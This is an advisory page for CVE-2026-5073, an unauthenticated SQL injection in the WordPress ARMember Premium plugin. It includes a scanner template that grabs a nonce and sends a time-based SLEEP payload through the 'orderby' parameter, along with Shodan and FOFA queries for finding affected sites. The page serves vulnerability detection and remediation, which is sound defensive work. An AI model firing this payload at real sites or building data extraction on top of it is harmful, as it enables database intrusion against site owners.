/Vulnerability Library

WordPress ARMember Premium <= 7.3.1 - Unauthenticated SQL Injection

CVE-2026-5073
Verified

Description

The ARMember Premium plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter of the 'arm_directory_paging_action' AJAX action in all versions up to, and including, 7.3.1. This is due to insufficient escaping on the user-supplied 'order' and 'orderby' parameters and the lack of sufficient preparation on the existing SQL query in the `arm_get_directory_members()` function.

Severity

Critical

CVSS Score

7.5

Exploit Probability

1%

Affected Product

armember

Published Date

June 9, 2026

Template Author

dhiyaneshdk

CVE-2026-5073.yaml
id: CVE-2026-5073

info:
  name: WordPress ARMember Premium <= 7.3.1 - Unauthenticated SQL Injection
  author: DhiyaneshDk
  severity: critical
  description: |
    The ARMember Premium plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter of the 'arm_directory_paging_action' AJAX action in all versions up to, and including, 7.3.1. This is due to insufficient escaping on the user-supplied 'order' and 'orderby' parameters and the lack of sufficient preparation on the existing SQL query in the `arm_get_directory_members()` function.
  impact: |
    This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  remediation: |
    Update ARMember Premium to version 7.3.2 or later.
  reference:
    - https://patchstack.com/database/wordpress/plugin/armember/vulnerability/wordpress-armember-premium-membership-plugin-content-restriction-member-levels-user-profile-user-signup-plugin-7-3-1-unauthenticated-sql-injection-vulnerability
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/b5f6d2a2-ad3e-4afc-b6fd-745881d85b6b
    - https://nvd.nist.gov/vuln/detail/CVE-2026-5073
    - https://codecanyon.net/item/armember-complete-wordpress-membership-system/17785056
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-5073
    epss-score: 0.01383
    epss-percentile: 0.69109
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 3
    vendor: reputeinfosystems
    product: armember
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/armember-membership/"
    fofa-query: body="/wp-content/plugins/armember-membership/"
  tags: cve,cve2026,sqli,time-based-sqli,wordpress,wp,wp-plugin,armember,unauth,vkev

flow: |
  http("detect") && http("get-nonce") && http("sqli")

http:
  - id: detect
    method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/armember-membership/readme.txt"

    matchers:
      - type: word
        words:
          - "ARMember"
        internal: true

  - id: get-nonce
    method: GET
    path:
      - "{{BaseURL}}/index.php?rest_route=/wp/v2/pages&per_page=100"

    extractors:
      - type: regex
        name: nonce
        internal: true
        group: 1
        regex:
          - "name='arm_wp_nonce'[^>]*value='([a-f0-9]+)'"

    matchers:
      - type: word
        words:
          - "arm_wp_nonce"
        internal: true

  - id: sqli
    raw:
      - |
        @timeout: 15s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=arm_directory_paging_action&pagination=infinite&id=1&type=directory&orderby=display_name,IF(1=1,SLEEP(6),0)&order=ASC&per_page=10&current_page=1&arm_wp_nonce={{nonce}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "duration>=6"

      - type: word
        part: body
        words:
          - "arm_directory_paging_container"
# digest: 4a0a0047304502202e84822dea2955cc7b5fac828ee7f194c52da3435525f9691aa410e64f44ecfb02210083e6624cf0605facd34b9bb24d984eddeed82c41bc44dd51972b94fc42dd77bb:922c64590222798bb761d5b6d8e72950
7.5Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2026-5073
CWE ID:
cwe-89

References

https://patchstack.com/database/wordpress/plugin/armember/vulnerability/wordpress-armember-premium-membership-plugin-content-restriction-member-levels-user-profile-user-signup-plugin-7-3-1-unauthenticated-sql-injection-vulnerabilityhttps://www.wordfence.com/threat-intel/vulnerabilities/id/b5f6d2a2-ad3e-4afc-b6fd-745881d85b6bhttps://nvd.nist.gov/vuln/detail/CVE-2026-5073https://codecanyon.net/item/armember-complete-wordpress-membership-system/17785056

Remediation Steps

Update ARMember Premium to version 7.3.2 or later.